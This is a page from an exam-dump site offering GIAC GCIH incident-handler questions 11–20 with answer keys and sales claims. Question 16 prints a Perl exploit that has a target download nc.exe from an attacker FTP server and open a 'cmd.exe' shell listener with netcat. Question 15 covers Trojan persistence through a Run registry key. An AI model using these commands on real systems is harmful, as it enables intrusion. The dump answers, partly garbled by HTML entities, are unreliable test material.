[Free] 2017(Sep) EnsurePass Testinsides GIAC GCIH Dumps with VCE and PDF 11-20

Ensurepass.com : Ensure you pass the IT Exams
2017 Sep GIAC Official New Released GCIH
100% Free Download! 100% Pass Guaranteed!
http://www.EnsurePass.com/GCIH.html

GIAC Certified Incident Handler

Question No: 11 – (Topic 1)

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

  1. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

  2. Worms can exist inside files such as Word or Excel documents.

  3. One feature of worms is keystroke logging.

  4. Worms replicate themselves from one system to another without using a host file.

Answer: A,B,D

Question No: 12 – (Topic 1)

Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data created by DNS cache poisoning?

  1. Stub resolver

  2. BINDER

  3. Split-horizon DNS

  4. Domain Name System Extension (DNSSEC)

Answer: D

Question No: 13 – (Topic 1)

Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?

  1. Win32/Agent

  2. WMA/TrojanDownloader.GetCodec

  3. Win32/Conflicker

  4. Win32/PSW.OnLineGames

Answer: C

Question No: 14 – (Topic 1)

The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook#39;s preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

  1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

  2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

  3. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = quot;file and pathname of the WAB filequot;

  4. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: C

Question No: 15 – (Topic 1)

You have inserted a Trojan on your friend#39;s computer and you want to put it in the startup so that whenever the computer reboots the Trojan will start to run on the startup. Which of the following registry entries will you edit to accomplish the task?

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Startup

  2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto

C.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Start

Answer: C

Question No: 16 – (Topic 1)

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = quot;192.168.1.1quot;;# Your FTP Server 89

$user = quot;Anonymousquot;;# login as

$pass = #39;noone@nowhere.com#39;;# password

#####################################################

$host = $ARGV[0]; print quot;Starting …\nquot;;

print quot;Server will download the file nc.exe from $your FTP server.\nquot;; system(quot;perl msadc.pl -h $host -C \quot;echo

open $your gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo $usergt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h

$host -C \quot;echo $passgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo bingt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo get nc.exegt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo get hacked. htmlgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo quitgt;gt;sasfile\quot;quot;); print quot;Server is downloading …

\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;ftp \-s\:sasfile\quot;quot;); print quot;Press ENTER when download is finished …

(Have a ftp server)\nquot;;

$o=; print quot;Opening …\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;nc -l -p $port -e cmd.exe\quot;quot;); print quot;Done.\nquot;;

#system(quot;telnet $host $portquot;); exit(0);

Which of the following is the expected result of the above exploit?

  1. Creates a share called quot;sasfilequot; on the target system

  2. Creates an FTP server with write permissions enabled

  3. Opens up a SMTP server that requires no username or password

  4. Opens up a telnet listener that requires no username or password

Answer: D

Question No: 17 – (Topic 1)

Which of the following takes control of a session between a server and a client using

TELNET, FTP, or any other non-encrypted TCP/IP utility?

  1. Dictionary attack

  2. Session Hijacking

  3. Trojan horse

  4. Social Engineering

Answer: B

Question No: 18 – (Topic 1)

Which of the following statements are true about firewalking?

Each correct answer represents a complete solution. Choose all that apply.

  1. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.

  2. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.

  3. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.

  4. Firewalking works on the UDP packets.

Answer: A,B,C

Question No: 19 – (Topic 1)

Which of the following tools can be used for stress testing of a Web server? Each correct answer represents a complete solution. Choose two.

  1. Internet bots

  2. Scripts

  3. Anti-virus software

  4. Spyware

Answer: A,B

Question No: 20 – (Topic 1)

Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?

  1. Fragroute

  2. Absinthe

  3. Stick

  4. ADMutate

Answer: B

100% Ensurepass Free Download!
Download Free Demo:GCIH Demo PDF
100% Ensurepass Free Guaranteed!
Download 2017 EnsurePass GCIH Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 EnsurePass IT Certification PDF and VCE

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.